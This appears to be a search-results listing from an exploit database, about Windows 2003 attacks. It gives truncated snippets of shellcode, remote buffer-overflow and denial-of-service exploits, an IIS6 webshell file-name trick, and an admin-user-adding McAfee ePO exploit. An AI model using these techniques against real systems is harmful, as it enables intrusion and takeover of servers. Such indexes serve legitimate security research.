30 matches found
win2003/x64 - Token Stealing shellcode - 59 bytes
;token stealing shellcode Win 2003 x64 ;based on the widely available x86 version ;syntax for NASM ;Author: Csaba Fitzl, @theevilbit ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;important structures and offsets; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;kd dt -r1 nt!TEB ; +0x110 SystemReserved1 : 54 Ptr64 Void...
MailEnable Enterprise & Professional https Remote BoF Exploit
No description provided by source. !/usr/bin/perl This tools and to consider only himself to educational purpose -=MailEnable Enterprise & Professional HTTPS remote BoF exploit=- -= =- -= Discovered & Coded by CorryL info:www.x0n3-h4ck.org=- -= irc.xoned.net x0n3-h4ck corryl80atgmail.com=-...
McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities
No description provided by source. Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20 November 2012 Exploit Author: [email protected] a.k.a. [email protected] Vendor Homepage: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx Version...
FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...
Savant Web Server 3.1 - Remote Buffer OverflowExploit (win2003)
No description provided by source. !/usr/bin/perl D:\Documents and Settings\Administrator\Desktop\explo da uppare\provasavant.pl -h 127.0.0.1 -= Savant Web Server 3.1 Remote Buffer Overflow Exploit =- -= =- -= Coded by CorryL info:www.x0n3-h4ck.org =- + Connect to 127.0.0.1 + Using 00b7ead8 // Re...
McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities
McAfee ePolicy Owner ePowner version 0.1 is an exploit that can add an administrative user to McAfee ePolicy Orchestrator as well as execute arbitrary commands on versions 4.6.0 through 4.6.5. Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20...
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities
McAfee ePolicy Orchestrator 4.6.0 4.6.5 - ePowner Multiple Vulnerabilities Exploit Title: McAfee ePolicy Orchestrator 4.6.0-4.6.5 ePowner - Multiple vulnerabilities Date: 20 November 2012 Exploit Author: [email protected] a.k.a. [email protected] Vendor Homepage:...
ttplayer 5.6Beta3 - Denial of Service (PoC)
ttplayer 5.6Beta3 - Denial of Service PoC Exploit Title: ttplayer=5.6Beta3 Dos POC Date: 2010-01-06 Author: t-bag YDteam. Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag crash = "ETM3U\n"+'QQ\1.'+"x41" 81 try: file =...
ttplayer <= 5.6 Beta3 Dos POC
Exploit for unknown platform in category dos / poc ===================== ttplayer = 5.6 Beta3 ===================== Exploit Title: ttplayer = 5.6 Beta3 Dos POC Author: t-bag Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag...
ttplayer 5.6Beta3 - Denial of Service (PoC)
Exploit Title: ttplayer=5.6Beta3 Dos POC Date: 2010-01-06 Author: t-bag YDteam. Software Link: http://ttplayer.qianqian.com Version: 5.6Beta3 Tested on: win7 and win2003 Code : !/usr/bin/python f t-bag crash = "ETM3U\n"+'QQ\1.'+"x41" 81 try: file = open'1.m3u','w'; file.writecrash; file.close;...
Microsoft IIS PHP File Parsing
IIS 6 0day php original exploit : http://www.securityfocus.com/bid/37460 by: PouyaServer When the upload pictures to File.php;file.jpg when, IIS will automatically parse the php format. to change the file name webshell 1.php;1.jpg Direct access to IE resloves the PHP that is the php shell into...
win2003 II6 parsing vulnerability practical and application-vulnerability warning-the black bar safety net
New win2003 IIS6 parsing vulnerability iis6 file parsing vulnerability announced. Use The webshell file name changed 1. asp;. jpg Direct IE access is parsed into ASP That is the asp shell into X. asp;. jpg in win2003 IIS6 environment will automatically resolve to the asp We have to combat it out ...
the oracle implementation of cmd-vulnerability warning-the black bar safety net
Installed a oracle db11g, so wanted to try online streaming in sqlplus, execute the cmd commands, also don't know how, not a good, might be online around the wrong turn. However there is a simple implementation of the cmd method: SQL host net user User accounts for \\PC-ATQHJ4UG1SDA...
Oracle Internet Directory 10.1.4 - Remote Denial of Service
!/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one shoot, but even when you...
Oracle Internet Directory 10.1.4 - Remote Denial of Service
Oracle Internet Directory 10.1.4 - Remote Denial of Service !/usr/bin/python """ Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. Sometimes you need 2 shoots to crash OID completely. T...
Hair two I have extracted the shellcode-exploit warning-the black bar safety net
Article author: pt007atvip.sina.com I. S. T. O. ALL RIGHTS RESERVED 1, A//win2003+sp2 was added under a test11/Test11!!! Admin user shellcode: unsigned char shellcode= "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x24"...
MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta)
No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same...
For grasping the win2003 system password trick-vulnerability warning-the black bar safety net
The command line to uninstall the win2003 sp1/sp2 %systemroot%$NtServicePackUninstall$\spuninst\spuninst /U Press the unattended mode to remove the service pack. If you use this option, then uninstall SP1, only fatal errors will only display the prompt. /Q Press the quiet mode to remove SP1, this...
Moving-2 0 0 6 file upload vulnerability principle and the attack implemented-vulnerability warning-the black bar safety net
Preface: This article is only to let everyone know about this vulnerability, please do not attack others! Action-the recent explosion of a vulnerability, much noise uproar, a lot of big stations have hung up. The use of 2 0 0 3 year of a vulnerability, the very old, in front of a burst of...
IMail 2 0 0 6 and 8. x Exp-vulnerability warning-the black bar safety net
C:\imail20068.x1.exe IMail 2 0 0 6 and 8. x SMTP 'RCPT' T ' Stack Overflow Exploit Coded by Greg Linares glinares. code at GMAIL dot com Usage: imail20068.x1.exe hostname port Payload JMP The Default port is 2 5 ============================== Payload Options: 1 = Default...